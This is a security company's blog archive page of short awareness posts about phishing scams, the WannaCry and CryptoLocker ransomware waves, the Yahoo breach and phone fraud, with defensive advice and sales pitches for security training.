Blog

Archive for Security Awareness Training

Scam of the Week: Department of Motor Vehicles Warns Drivers About Traffic Ticket Phishing

Online reporter Doug Olenick at SC Media was the first to point to a press release from the NY State Department of Motor Vehicles warning about a phishing scam where New York drivers are being targeted, stating they have 48 hours to pay a fine or have their driver’s license revoked.  This may happen in your state as well, so this is your heads-up.

The NY DMV alerted motorists that the scam is just bait to entice them to click on a “payment” link that will in turn infect their workstation with malware. The DMV does not know how many people have been affected, but Owen McShane, director of investigations at New York State DMV, said calls came in from New York City, Albany and Syracuse.

Olenick was able to get a bit more detail: “The malware being dropped came in two categories. The first simply placed a tracking tool on the victim’s computer to see what websites were visited; and the second, more nefarious, attempted to acquire a variety of personally identifiable information, such as names, Social Security numbers, date of birth and credit card information.”

There are several social engineering red flags that show the email is a scam. The supplied links lead to sites without an ny.gov URL, tied to the fact that the state would never make such a request. Here is how the phishing email reads:

License_Phish-Example.png

The Department of Motor Vehicles does not send emails urging motorists to pay traffic tickets within 48 hours or lose your license,” said Terri Egan, DMV deputy executive commissioner, in a statement.

McShane noted that this scam is similar to one that hit the state about 18 months ago. The DMV, he said, is often used as bait in phishing attacks. Most previous attacks only lasted for 24 to 48 hours and this attack seems to have wrapped up too at this point, he added. This means that the bad guys may have moved on to other states with this attack, so…

I suggest you send employees, friends and family an email about this Scam Of The Week.  Obviously, an end-user who was trained to spot social engineering red flags like this would have thought before they clicked.

 

Lean More about Security Awareness training for your entire company.

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training

Leave a Comment (0) →

Scam of the Week: Massive DocuSign Phishing Attacks

DocuSign has admitted they were the victim of a data breach that has led to massive phishing attacks which used exfiltrated DocuSign information. Ouch. So here is your Scam Of The Week.

They discovered the data breach when on May 9, 15, and 17 DocuSign customers were being targeted with phishing campaigns. They now are advising customers to filter or delete any emails with subject lines like:

  • Completed: [domain name] – “Wire transfer for recipient-name Document Ready for Signature”
  • Completed [domain name/email address] – “Accounting Invoice [Number] Document Ready for Signature”
  • Subject: “Legal acknowledgement for [recipient username] Document is Ready for Signature”

The campaigns all have Word docs as attachments, and use social engineering to trick users into activating Word’s macro feature which will download and install malware on the user’s workstation.  DocuSign warned that highly likely there will be more campaigns in the future.  Here is an example, these emails look very real:

DocuSign_Example_Phishing_Email.png

I suggest you send the following to your employees, friends, and family. You’re welcome to copy, paste, and/or edit:

“Hackers have stolen the customer email database of DocuSign, the company that allows companies to electronically sign documents. These criminals are now sending phishing emails that look exactly like the real DocuSign ones, but they try to trick you into opening an attached Word file and click to enable editing.

But if you do that, malware may be installed on your workstation. So if you get emails that look like they come from DocuSign and have an attachment, be very careful. If there is any doubt, pick up the phone and verify before you electronically sign any DocuSign email. Remember: Think Before You Click.”

 

See How Sentree Systems, Corp. can Help!!


Learn More!

 

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News

Leave a Comment (0) →

[Alert] WannaCry Ransomware Attack Uses NSA 0-Day Exploits To Go On Worldwide Rampage

NHS Ransomware Attack

This screenshot is just one example: The IT systems of around 40 National Health System hospitals across the UK were affected by this ransomware attack. Non-emergency operations have been suspended and ambulances are being diverted as a result of the infection. Cybersecurity experts have long used the phrase “where bits and bytes meet flesh and blood,” which signifies a cyberattack in which someone is physically harmed.

Mikko Hypponen, chief research officer at the Helsinki-based cybersecurity company F-Secure, called the attack “the biggest ransomware outbreak in history.” This is a cyber pandemic caused by a ransomware weapon of mass destruction. In the Jan 3 issue of CyberheistNews, we predicted that 2017 would be the year where we’d see a ransomworm like this. Unfortunately, it’s here.

Banks, Trains and Automobiles

Hundreds of thousands of machines are infected worldwide, including FedEx Corp, Renault, Nissan, the German Railways, Russian banks, gas stations in China, and Spanish telecommunications firm Telefonica (which reported 85% of their systems being down as a result of the cyberattack), and in a case of poetic justice, Russia seems to have been hit the hardest up to now. The source is Kaspersky’s Securelist, note that this is just the early days, and their visibility is likely limited.

wannacry_03.png

The strain is called “Wana Decrypt0r” which asks $300 from victims to decrypt their computers. This monster has infected hundreds of thousands of systems in more than 150 countries. Monday morning when people get back to work, these numbers will only go up. Check out an early animated map created by the NYTimes.

Here is an infection map based on data from MalwareTech.com:

Wana_Infection_Map.png

…and the Wall Street Journal also created an InfoGraphic explaining the spread of Wana which is nice to show to management when you ask for more IT security budget to train your users – which would prevent this whole mess.

WSJ_Wana_Info.png

Bleepingcomputer said: “Whoever is behind this ransomware has invested heavy resources into Wana Decrypt0r’s operations. In the few hours this ransomware has been active, it has made many high-profile victims all over the world. “Affected machines have six hours to pay up and every few hours the ransom goes up,” said Kurt Baumgartner, the principal security researcher at security firm Kaspersky Lab. “Most folks that have paid up appear to have paid the initial $300 in the first few hours.”

Despite the fact that this strain is hyper-agressive, the criminals behind the code do not seem to be all that sophisticated, they are using only a limited amount of static bitcoin wallets. Could even be that they are relative newbies at ransomware, and that the NSA worm-code has run amock scaring the daylight out them, afraid to be caught.

The Ransom Deadline Is Short

The ransom starts at $300 for the first 6 hours, and you’ve got up to 3 days to pay before it doubles to $600. If you don’t pay within a week then the ransomware threatens to delete the files altogether. Note the social engineering aspect here too: a sense of urgency is created to prompt people into action. A sense of hope is granted by virtue of the ability to decrypt a sample selection of the files

The ransomware’s name is WCry, but is also referenced online under various names, such as WannaCry, WannaCrypt0r, WannaCrypt, or Wana Decrypt0r. As everybody keeps calling it “Wana Decrypt0r,” this is the name we’ll use in this article, but all are the same thing, which is version 2.0 of the lowly and unimpressive WCry ransomware that first appeared in March.”

Kaspersky Lab also reports that the Wana strain has numerous languages available and was designed to affect multiple countries.

wana-decrypt0r-2_0.png

Sky News Technology Correspondent Tom Cheshire described the attack as “unprecedented”. The ransomware is using originally NSA 0-day ETERNALBLUE and DOUBLEPULSAR exploits which were made public earlier this year by a group calling itself the ShadowBrokers. There are recent patches available but many have not applied them yet.

 

Former U.S. intelligence contractor turned whistleblower Edward Snowden pointed the finger at the NSA, implying the agency was responsible for exploiting a weakness in Windows. It is not clear yet how the ShadowBrokers first got their hands on the NSA tools – conspiracy theories range from a contractor leak to a Russian counter-espionage trying to hint American intelligence should back off.
The group ShadowBrokers first appeared in August, claiming it had stolen tools from the Equation Group, a legendary espionage operation rumored to be affiliated with the NSA. The Brokers announced they had the tools and offered to auction them off which did not go very far. In January, the group gave up, only to resurface in April dumping EternalBlue and other Windows hacking tools in the public domain, where criminal hackers were grateful recipients.

 

The Initial Infection Vector Is A Well-crafted Phishing Email.

 

According to CrowdStrike’s vice president of intelligence Adam Meyers, the initial spread of WannaCry is coming through phishing, in which fake invoices, job offers and other lures are being sent out to random email addresses. Within the emails is a password protected .zip file, so the email uses social engineering to persuade the victim to unlock the attachment with a password, and once clicked that initiates the WannaCry infection. Microsoft confirms this in a blog post.

But the most concerning aspect of WannaCry is its use of the worm-like EternalBlue exploit. “This is a weapon of mass destruction, a WMD of ransomware. Once it gets into an unpatched PC it spreads like wildfire,” CrowdStrike’s Meyers told Forbes. “It’s going through financials, energy companies, healthcare. It’s widespread.”

“We encourage all Americans to update your operating systems and implement vigorous cybersecurity practices at home, work, and school,” the U.S. Department of Homeland Security said in a statement released late Friday. “We are actively sharing information related to this event and stand ready to lend technical support and assistance as needed to our partners, both in the United States and internationally.” Here is a technical nosedive of the Wana malware.

If You Can, Apply This Patch Immediately.

After the initial infection, the malware spreads like a worm via SMB, that is the Server Message Block protocol used by Windows machines to communicate with file systems over a network. According to Cisco’s TALOS team:

The file tasksche.exe checks for disk drives, including network shares and removable storage devices mapped to a letter, such as ‘C:/’, ‘D:/’ etc. The malware then checks for files with a file extension as listed in the appendix and encrypts these using 2048-bit RSA encryption.

From what we have been able to learn, Wana spreads through SMB so when we’re talking about machines behind firewalls being impacted, it implies ports 139 and 445 being open and at-risk hosts listening to inbound connections. It’d only take one machine behind the firewall to become infected to then put all other workstations and servers at risk due to it being a true worm.

In the mean time, harden yourselves against this Windows Network Share vulnerability and ensure that all systems are fully patched with the “MS17-010” security update (link below) and remind all staff to Think Before They Click when they receive any out of the ordinary emails. https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Redmond Issues Emergency Patch For WinXP

Microsoft has also released out-of-band patches for older versions of Windows to protect against Wana, because the original patch did not include XP/Win8. “This decision was made based on an assessment of this situation, with the principle of protecting our customer ecosystem overall, firmly in mind,” the company told customers in a blog post.

Besides installing these out-of-band updates — available for download from here — Microsoft also advises companies and users to outright disable the SMBv1 protocol, as it’s an old and outdated protocol, already superseded by newer versions, such as SMBv2 and SMBv3. You can use Grooup Policy for Clients and Servers. Here is a script to check the complete Active Directory for systems that miss the WanaCry related hotfixes.

Here is how to remove SMBv1 on Windows 10:

Turn_Off_SMB.png

And here is how to turn if off on Windows Servers. Start with those…

SMBV1_win_server.png

Another option: Use DSC to enforce the SMBv1 removal. If you don’t have DSC in place, you can use DSC local on your servers as well. You can now download security updates for Windows Server 2003 SP2 x64, Windows Server 2003 SP2 x86,Windows XP SP2 x64, Windows XP SP3 x86, Windows XP Embedded SP3 x86, Windows 8 x86, and Windows 8 x64.

A Honeypot Server Got Infected With WanaCry 6 Times In 90 Minutes

As the original one, the second variant is automatically executed by “Microsoft Security Center (2.0) Service” and is trying to spread by creating SMB connections to random IP addresses, both internal and external.

According to an experiment carried out by a French security researcher that goes online by the name of Benkow. WanaCry infected the honeypot in a mere three minutes after it was reset, showing the aggressive nature of the ransomware’s scanning module, which helps it spread to new victims. Noteworthy: three minutes is about the same amount of time IoT malware will infect a vulnerable home router left connected to the Internet without patches.

How To Detect The Presence Of Wana And SMBv1 Servers On Your Network

One of the easiest ways to monitor what is happening on your network is to setup a SPANMirror port or use a network TAP. This will give you access to flows and packet payloads so you can see who is connecting to what and if there is anything suspicious moving around. Check out this blog post if you use Cisco switches, it explains how you can monitor multiple network segments without the need to remember what is connected to what switch port. If you don’t use Cisco switches there is an excellent resource on the Wireshark wiki site which looks at how to setup monitoring on other switches.

There is one caveat though, this infection moves out like lightning from patient zero, and all vulnerable machines are literally locked in less than two minutes so monitoring alone would not be enough to be stop this monster. Here is a video showing a machine on the left infected with MS17-010 worm, spreading WCry ransomware to machine on the right in real time.

There Are Four Things To Watch Out For When It Comes To Detecting Wana

  1. Check for SMBv1 use
  2. Check for an increase in the rate of file renames on your network
  3. Check for any instances of the file @Please_Read_Me@.txt on your file shares
  4. Check for any instances of files with these extensions
    • .wnry
    • .wcry
    • .wncry
    • .wncryt

If Your Network Has Been Infected, What To Do?

This ransomware strain cannot be decrypted with free tools. Research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake has not been found yet.

Your best bet is to recover from backups, and if your backup failed or does not exist, try a program like Shadow Explorer to see if the ransomware did not properly delete your Shadow Volume Copies. If a user did not click Yes at the UAC prompt, then there is a chance those are still available to start the recovery. Here is How to recover files and folders using Shadow Volume Copies. As a last resort and all backups have failed, you could decide to pay and get the files decrypted. It appears to work.

uac-prompt.png

What Can Be Done To Stop These Bad Guys?

It’s possible but difficult. The money has reportedly been flooding into hackers’ accounts and investigators can track the money and see where the bitcoin ends up. “Despite what people tend to think, it’s highly traceable,” Clifford Neuman, who directs the University of Southern California’s Center for Computer Systems Security. told the Washington Post.

However, hackers are still able to hide and launder the bitcoins in many different ways. Investigators will also examine the code itself as hackers often leave identifiable traces of their work. You can watch as some of these wallets are receiving money in real time.

Here Are 8 Things To Do About It (apart from having weapons-grade backups)

  1. Check your firewall configuration and make sure no criminal network traffic is allowed out, and disable SMBv1 on all machines immediately
  2. From here on out with any ransomware infection, wipe the machine and re-image from bare metal
  3. If you have no Secure Email Gateway (SEG), get one that does URL filtering and make sure it’s tuned correctly
  4. Make sure your endpoints are patched religiously, OS and 3rd Party Apps
  5. Make sure your endpoints and web-gateway have next-gen, frequently updated (a few hours or shorter) security layers
  6. Identify users that handle sensitive information and enforce some form of higher-trust authentication (like 2FA)
  7. Review your internal security Policies and Procedures, specifically related to financial transactions to prevent CEO Fraud
  8. Deploy new-school security awareness training, which includes simulated social engineering tests via multiple channels, not just email.

See How Sentree Systems, Corp. can Help!!


Learn More!

 

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News, Tech Tips for Business Owners

Leave a Comment (0) →

French Presidential Candidate Target Of Russian Hacker Phishing Attack

The French presidential election has been hit with a case of déjà vu. Emmanuel Macron’s campaign said its staff received phishing emails meant to steal their passwords.

Trend Micro said in a report set to be published today that they have found evidence of a phishing attack targeting French presidential candidate Emmanuel Macron. The emails and fake sites sites could have tricked campaign staff into entering their credentials and allow malware to infect their computers, their researchers stated. Candidate_Macron_campaign_phishing_attack.png

Macron, of the relatively new “En Marche” party which translates to “on the move”, will be in a runoff on May 7 against National Front candidate Marine Le Pen for the French presidency. Macron’s campaign confirmed to the Wall Street Journal that its staffers received emails leading to fraudulent websites, but that the attempts were blocked, but who knows if they really were.

The hacking group behind the phishing attempts was Russian APT28, a group tracked for years by many security researchers.  This group of criminal hackers is also known as Pawn Storm, Sofacy, Strontium, Fancy Bear, and SecureWorks calls them “IRON TWILIGHT“.  Here is a backgrounder on APT28.

As part of the attack, hackers set up multiple internet addresses that mimicked those of the campaign’s own servers in an attempt to lure Mr. Macron’s staffers into turning over their network passwords, said Feike Hacquebord, a senior threat researcher for Tokyo-based Trend Micro and the author of the report, a copy of which was reviewed by The Wall Street Journal.

Security researchers state it is highly likely APT28 are supported by the Russian Government, specifically the GRU which is the Russian military intelligence arm, the counterpart of the FSB (former KGB). APT28 “active measures” were trying to influence U.S. presidential elections and at the moment try to do the same thing in France and Germany.  Kremlin spokespeople deny everything vehemently. Yeah, sure.

What to do about It

SecureWorks recommends the following excellent best practices to prevent network compromise:

  1. Apply best-practice security controls such as regular vulnerability scanning and patching,
  2. Have network monitoring tools in place.
  3. User education reduces your susceptibility to compromise.
  4. Implement two-factor authentication (2FA) on internal and third-party webmail platforms.
  5. Encourage employees use 2FA on their personal accounts.
  6. Restrict work-related communication from personal email.

 

Get Your Security Audit Today, Tomorrow Could be Too Late!!!

Did you know that the average breach goes undetected for more than 200 days?


Get Your Data Security Audit

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News

Leave a Comment (0) →

This Week’s Top “In The Wild” Phishing Attacks

And here are this week’s Top 10 “In The Wild” phishing attacks that we received from our customers by employees clicking the Phish Alert Button and sending the email to us for analysis.

We “defang” these attacks and have them updated real-time in a campaign that customers can run regularly to test employees against the “real thing”. In_The_Wild_Phishing_Attacks.png

  • “Chase/JP Morgan: Online Access Restricted” – Spoofed bank email asks users to click malicious link to restore account access.
  • “WhatsApp: Missed Voicemail Notification” – Fake WhatsApp voicemail notification delivers malicious link.
  • “Uber: Update Your Account” – Fake Uber software update notification invites users to click malicious link.
  • “Sharepoint Security Alert – Action Required” – Spoofed Sharepoint email asks users to click malicious link to restore account access.
  • “ShareFile/Citrix: Urgent Info regarding your Sharefile Portal” – Fake Sharefile email offers malicious link for users to click.
  • “NatWest: You sent a payment of 2939.00 GBP to Best EBuyer Limited” – Spoofed bank email offers details on an alleged payment via a malicious link.
  • “De-activation of Email In Process” – Users are required by fake IT admin email to click a malicious link in order to preserve account.
  • “Payoff Authorization” – Email delivers malicious attachment presented as a mortgage payoff authorization.
  • “VAT Return and Payment Overdue” – Fake VAT return and payment form delivered as attachment to a spoofed bank email.
  • “FW: Confidential” – “Confidential” notification tells user to click a malicious link or open an HTML attachment to obtain a “secure” message.

Note that these have made it through all the filters and into the inbox of the employee. That is one of the reasons we continue to remind IT pros that creating a human firewall is an essential last line of defense which you cannot do without.

Today, your employees are frequently exposed to sophisticated phishing and ransomware attacks. Old-school Security Awareness Training doesn’t hack it anymore. More than ever, your users are the weak link in your network security. Get a product demonstration of the innovative KnowBe4 Security Awareness Training Platform. In this live one-on-one demo we will show you how you can:

checkmark NEW  Access to the world’s largest library of security awareness training.

checkmark NEW  Social Engineering Indicators technology, turns every simulated phishing email into a tool you can use to instantly train employees.

checkmark Send Simulated Phishing tests and drive down the Phish-prone percentage.

checkmark Advanced Features: EZXploit™ automated “human pentest”. USB Drive Test™ 

checkmark Active Directory Integration allows you to easily upload and manage users.

checkmark Reporting to watch your Phish-prone percentage drop, with great ROI.

 

Get Your Security Audit Today, Tomorrow Could be Too Late!!!

Did you know that the average breach goes undetected for more than 200 days?


Get Your Data Security Audit

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News

Leave a Comment (0) →

Ransomware Causes 90-day Downtime And 700K Damages For Law Firm Who Then Sues Their Insurer

Moses_Afonso_Ryan_Ltd.png

 

PROVIDENCE, R.I. — Cybercriminals held a Providence law firm hostage for months by encrypting its files and demanding $25,000 in ransom paid in Bitcoin to restore access, according to a lawsuit filed in U.S. District Court.

Moses Afonso Ryan Ltd. is suing its insurer, Sentinel Insurance Co., for breach of contract and bad faith after it denied its claim for lost billings over the three-month period the documents were frozen by the ransomware infection.

According to the lawsuit, during the time their files were inaccessible, the firm’s 10 lawyers were left unproductive and inefficient — amounting to $700,000 in lost billings.

After paying the Bitcoins, the firm then had to re-negotiate those terms after the initial key to de-crypt their files failed to work. They had to purchase more Bitcoins in exchange for other tools to recover their documents.

Ransomware Develops Into “Valet Thievery” Driven By Phishing Attacks

Attackers are tailoring their demands to their victims, in essence making it a brand of “valet thievery,” said cyber expert Doug White, director of forensics, applied networking and security at Roger Williams University. They might demand $800 from a household, and push that sum into the thousands if they realize they’ve hit a law firm or hospital, White said. They key to the infections are phishing attacks that use social engineering to trick an employee to open a malicious attachment.

It’s a crime, too, that is vastly underreported, law enforcement agencies say. “The shame of it keeps it from being reported,” White said, as businesses don’t want to sully their image or reveal weakness. “Usually they just pay them off. It’s the cost of doing business.”

 

Moses Afonso Ryan Ltd. is not alone in falling victim to such a crippling attack. Police departments, town halls, law firms, accounting firms and individuals have been hit across Rhode Island, according to Capt. John C. Alfred, head of the the Rhode Island State Police cyber-crimes unit.

Protecting a network involves everyone in it from a janitor to the CEO

“I never tell anyone to buy the ransomware key because it’s sponsoring illegal activity,” Alfred said. He added: “You have to back-up the data beforehand. That’s what you have to do. You’re not going to get that data back. Even if you pay, you might not get the key.” Protecting a network involves everyone in it from a janitor to the CEO, he added.

Dana M. Horton, representing Sentinel Insurance in the lawsuit, also did not immediately respond to an email and a phone call seeking comment. The company has not yet filed a response in U.S. District Court.

White questioned whether the law firm’s suit would succeed, saying it would “open a giant can of poison worms” for the insurance industry. Alfred, too, emphasized that cyber security insurance is a growing field. “Everybody is going to be insuring their data,” Alfred said.

Heads-Up: Cyber insurance Does Not Pay Out For Human Error

You need to read the fine print in your cyber insurance policy if you have one, or if you are negotiating one. These policies normally do not cover incidents caused by human error, they only pay out for software-related vulnerabilities. This is a gotcha you need to be aware of, because your organization might have a false sense of security.

Capt. John C. Alfred, head of the the Rhode Island State Police cyber-crimes unit is right. You do need to step all employees through new-school security awareness training, from the mail room to the board room!

Full story at Providence Journal.

 

See How Sentree Systems, Corp. can Help!!


Learn More!

 

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News

Leave a Comment (0) →

Northrop Grumman Can Make a Stealth Bomber – but Falls for W-2 Phishing Attack

America was the victim of 34 percent of global ransomware infections in 2016, while only being 4.4 percent of the world’s population.

The “why” is clear; a whopping 64 percent of Americans are willing to pay to get their files back, as opposed to only 34 percent of victims worldwide, per Symantec’s 2017 Internet Security Threat Report.

Surprisingly, Symantec’s results show paying ransom doesn’t guarantee universal results as just 47 percent of global victims who paid up in 2016 reported getting their files back, which is in direct contradiction with our own experience, where we helped dozens of victims with a 95% successful return of all their files.

Note, these were organizations at their wit’s end who found us on the internet and needed help to get their files back after an employee opened an infected attachment, not existing KnowBe4 customers calling us about our Ransomware Guarantee.

Newly discovered ransomware families jumped last year from 30 in 2015 to 101 in 2016. The number of new variants of existing ransomware code, however, dipped. “It suggests that more attackers are opting to start with a clean slate by creating a new family of ransomware rather than tweaking existing families by creating new variants,” the report said.

Infections of consumers at the house counted for 69 percent, but Symantec found that that some attackers are executing more sophisticated attacks against businesses, where they silently penetrate the network, move laterally and then encrypt all machines at the same time.

The ransoms themselves also skyrocketed, climbing 266 percent last year, from an average of 294 dollars in 2015 to 1,077 dollars in 2016 helped by a Bitcoin price which is over 1,300 dollars at the time of this writing. The report also showed that attackers have begun customizing individual ransom demands based on the type of data and the volume of files that were encrypted.

Symantec Report Confirmed by Verizon, SANS and NTT

Verizon’s vendor-neutral 2017 Data Breach Investigations Report (in which KnowBe4 participated as a data source) found that ransomware levels in 2016 were up 50 percent over 2015 figures. Verizon also found that the types of attacks targeting organizations vary from sector to sector. For instance, manufacturing has the lowest median level DDoS level, but the highest level of espionage-related breaches.

The SANS 2016 Threat Landscape survey reported: “Phishing and spearphishing were among the top ways threats enter organizations, which setup a perfect storm for ransomware to blossom. 75% of threats entered via email attachment, 46% malicious link. User education alone is not sufficient. At a corporate level, perimeter protections, including email screening and ext-gen firewalls can reduce the volume of malware that can trip up an end user. From there, the endpoint needs every advantage to remain secure – behavior based malware detection, whitelisting, access control and appropriate network segmentation.”

The growing threat was further confirmed by more research from NTTSecurity: 2017 Global Threat Intelligence Report which found that 22 percent of all global incident engagements were related to ransomware, more than any other category of attack.

Of the ransomware attacks observed via NTTSecurity’s intelligence network, 77 percent were concentrated among four industries – business and professional services (28 percent), government (19 percent), health care (15 percent), and retail (15 percent).

Half of all incidents affecting health care organizations involved ransomware. “This may indicate that attackers have identified health care institutions as a vulnerable target more willing to pay ransom than other sectors,” their report noted.

 

Get Your Security Audit Today, Tomorrow Could be Too Late!!!

Did you know that the average breach goes undetected for more than 200 days?


Get Your Data Security Audit

 

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News

Leave a Comment (0) →

[Scam Alert] Scam Hooks Victims With a Single Word

'Can You Hear Me?' Scam Hooks Victims With a Single Word

 

Don’t pick up the phone to answer calls from unknown numbers. Instead, let them go to voicemail.

That’s the operational security advice being promulgated to Americans by the U.S. Federal Communications Commission in response to an ongoing series of attacks designed to trick victims into uttering a single word.

The FCC says in a March 27 alert that the scam centers on tricking victims into saying the word “yes,” which fraudsters record and later use to attempt to make fraudulent charges on a person’s utility or credit card accounts.

“The scam begins when a consumer answers a call and the person at the end of the line asks, ‘Can you hear me?’ The caller then records the consumer’s ‘Yes’ response and thus obtains a voice signature,” the FCC warns. “This signature can later be used by the scammers to pretend to be the consumer and authorize fraudulent charges via telephone.”

Fake Tech Support

This isn’t the first time that fraudsters have “weaponized” the telephone.

Scammers have long phoned consumers, pretending to be from a government agency such as the Internal Revenue Service. Another frequent ploy is pretending to be from the support department of a technology firm, such as Microsoft or Facebook, and then trying to get victims to pay for bogus security software meant to fix nonexistent problems on their PC (see Researcher Unleashes Ransomware on Tech-Support Scammers).

Authorities have made some related arrests. Last year, Indian police arrested 70 suspects as part of an investigation into a fake IRS call center scam.

Also last year, the FTC announced a $10 million settlement with a Florida-based tech-support scheme, run by an organization called Inbound Call Experts, also known as Advanced Tech support. The FTC and the state of Florida said the organization ran “services falsely claiming to find viruses and malware on consumers’ computers.”

Researchers Study Scammers

In a recent paper, “Dial One for Scam: A Large-Scale Analysis of Technical Support Scams,” researchers at the State University of New York at Stony Brook described how the tech-support version of these scams work, as well as how they might be disrupted by targeting the infrastructure on which scammers rely.

Screenshot of a technical support scam that mimics a Windows “blue screen of death” to increase its trustworthiness. (Source: “Dial One for Scam”)

“Scammers use specific words in the content of a scam page to convince the users that their machines are infected with a virus,” the researchers say.

The Stony Brook researchers designed a tool called ROBOVIC – for robotic victim – that found that of 5 million domains that it successfully connected to during a 36-week period beginning in September 2015, it logged 22,000 URLs as serving tech-support scams, connecting to a total of about 8,700 unique domain names.

But those 22,000 different web pages used a total of only 1,600 phone numbers, of which 90 percent were connected to one of four VoIP services: Bandwidth, RingRevenue, Twilio and WilTel.

The researchers also phoned 60 scam telephone numbers to log the social engineering tactics – aka trickery – used by scammers. The researchers found that on average, scammers waited until 17 minutes of a call elapsed before offering their services in exchange for money. Most would offer support packages that ranged from a one-time fix to multi-year support, with costs ranging from $69.99 to $999.99. Scammers would typically offer multiple options, then try to persuade victims to pick the middle-priced one, the researchers found.

Freelance attacks appear to be rare. “Through the process of interacting with 60 different scammers, we are now convinced that most, if not all, scammers are part of organized call centers,” the researchers write.

Fake Support is Lucrative

These attacks are relatively easy to launch, inexpensive to run, potentially very lucrative and show no signs of stopping.

Peter Kruse, head of the security group at Danish IT-security firm CSIS, this week warned via Twitter that multiple websites were pretending to be related to the technical support group from Czech anti-virus software developer Avast and urging individuals to call one of the listed phone numbers.

Needless to say, these numbers don’t lead to Avast, which develops free security software that’s used by many consumers. Instead, the numbers go to call centers tied to fraudsters. Avast has repeatedly warned that this a well-worn scam, with attackers often claiming to be connected to Avast, Dell, Microsoft, Symantec or other technology firms.

Advice for Victims

There’s no way to prevent criminals from running these types of scams.

But law enforcement and consumer rights groups have long urged victims to file a report, even if they didn’t suffer any financial damage as a result.

For anyone targeted by the “yes” scam, the FCC recommends immediately reporting the incident to the Better Business Bureau’s Scam Tracker and to the FCC Consumer Help Center. The FCC’s site also offers advice on tools for blocking robocalls, texts and marketing calls.

 

Anyone who thinks they may have been the victim of phone scammers, for example, by paying for fake tech support, can file a fraud report with their credit card company.

Authorities also recommend they report the attempt to relevant authorities, such as the FBI’s IC3 Internet Complaint Center or to the U.K.’s ActionFraud. Law enforcement agencies use these reports as a form of crowdsourcing, helping them secure funding to battle these types of scams, as well as take them down.

 

Provided by Data Breach Today

Are you at RISK of a security breach?

Did you know that the average breach goes undetected for more than 200 days? Find out in 60 seconds if you are VULNERABLE to a Cyber Breach!  


Test your Internet Connection!

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News

Leave a Comment (0) →

A Single Spear Phishing Click Caused The Yahoo Data Breach

A single click was all it took to launch one of the biggest data breaches ever.

One mistaken click. That’s all it took for a Canadian hacker aligned with rogue Russian FSB spies to gain access to Yahoo’s network and potentially the email messages and private information of as many as 1.5 Billion people.

The U.S. Federal Bureau of Investigation has been investigating the intrusion for two years, but it was only in late 2016 that the full scale of the hack became apparent. On Wednesday, the FBI Russian major Dmitry Dokuchaevindicted four people for the attack, two of whom are rogue FSB spies who work for the division that is supposed to cooperate with America’s FBI on cybercrime investigations.  (The FSB is the successor to the KGB). 

Kremlin Intelligence Services Overlap With Russian Cybercrime Underworld

One of these two rogues, Dmitry Dokuchaev, was himself recently arrested on what the Moscow press calls “treason” charges for passing information to the CIA. In reality, Dokuchaev started out as a criminal hacker who moved to the FSB but never stopped his old tricks. He was just one of the many criminals working inside Russia’s intelligence bureaucracy, and for personal profit he sold information to intermediaries that ultimately found its way to the CIA.

The investigation exposed rivalries inside the Kremlin intelligence establishment as well as inside the Russian cybercrime underworld with which it overlaps. Dokuchaev was part of  the Shaltai-Boltai, a hacker group that exploits stolen data to embarrass and blackmail Russian politicians and business officials.

Here’s how the FBI says they did it:

The hack began with a spear-phishing email sent in early 2014 to a Yahoo company employee. It’s unclear how many employees were targeted and how many emails were sent, but it only takes one person to click on a link, and it happened. Unimaginable that Yahoo did not sufficiently step employees through new-school security awareness training to prevent disasters like this.

It was all over the press, but CSO had the best story about, with more detail, background and even video:

http://www.csoonline.com/article/3180762/data-breach/inside-the-russian-hack-of-yahoo-how-they-did-it.html

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News

Leave a Comment (0) →

[ALERT] New Massive Wave Of CryptoLocker Ransomware Infections

We all thought that evil genius Evgeniy Bogachev had retired at the Black Sea with his tens of millions of ill-gotten gains after he became the FBI’s #1 Most Wanted cybercriminal. Well, perhaps he ran out of money.evgeniy-mikhailovich-bogachev.jpg

CryptoLocker is back big time. Researchers have spotted a sudden resurgence this year, specifically identifying clusters of attacks in Europe and the U.S.

For people new to the ransomware racket, Russian cybercrime gangs tend to test and debug their campaigns in Europe, and then attack America in full force. CryptoLocker is ransomware’s still very potent granddaddy, and pioneered this highly successful criminal business model in September 2013, hundreds of copycats followed

In a blog post our friend Larry Abrams from BleepingComputer wrote that the strain — also known as Torrentlocker and Teerac — started its comeback toward the end of January 2017, after being quiet the second half of 2016.

Larry pointed to stats from the ID-Ransomware website which show CryptoLocker infections jumped from a just handful to nearly 100 per day to more than 400 per day by February.

 

He also confirmed CryptoLocker’s recent tsunami with Microsoft’s Malware Protection Center, whose telemetry picked up on increased attacks against Europe, especially Italy. The phishing emails are designed to look secure and official because they are digitally signed, but it is all just social engineering to trick the recipient and get them to open attached .JS files that download and install CryptoLocker.idr-chart.jpg

Check Point Software Technologies confirmed with SC Media that its researchers also observed a sudden rise in CryptoLocker attacks. The phishing emails attempt to trick recipients into opening a zipped HTML file. “The HTML contains JS file, which pulls a second JS file from an Amazon server, which executes the first one on memory,” said Lotem
Finklesteen, threat intelligence researcher at Check Point.

“Then, after pulling two more JS files, CryptoLocker is served to the victim machine and being executed. The vast majority of the infections we observed this week were in the U.S. The second major target was Western Europe, especially Germany,” said Finklesteen.

Ransomware as a global threat

Microsoft’s Malware Protection Center blog stated: “Ransomware proved to be a truly global threat in 2016, having been observed in more than 200 territories. In the US alone, ransomware was encountered in more than 460,000 computers or 15% of global encounters. Italy and Russia follow with 252,000 and 192,000 ransomware encounters, respectively. Korea, Spain, Germany, Australia, and France all registered more than 100,000 encounters. Here is their geographic distribution chart. 

 

geographic-distribution.png

 

For help in stopping Ransomware in its tracks contact us today, 317-939-3282

 

See How Sentree Systems, Corp. can Help!!


Learn More!

Share

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News

Leave a Comment (0) →
Page 1 of 3 123
Real Time Web Analytics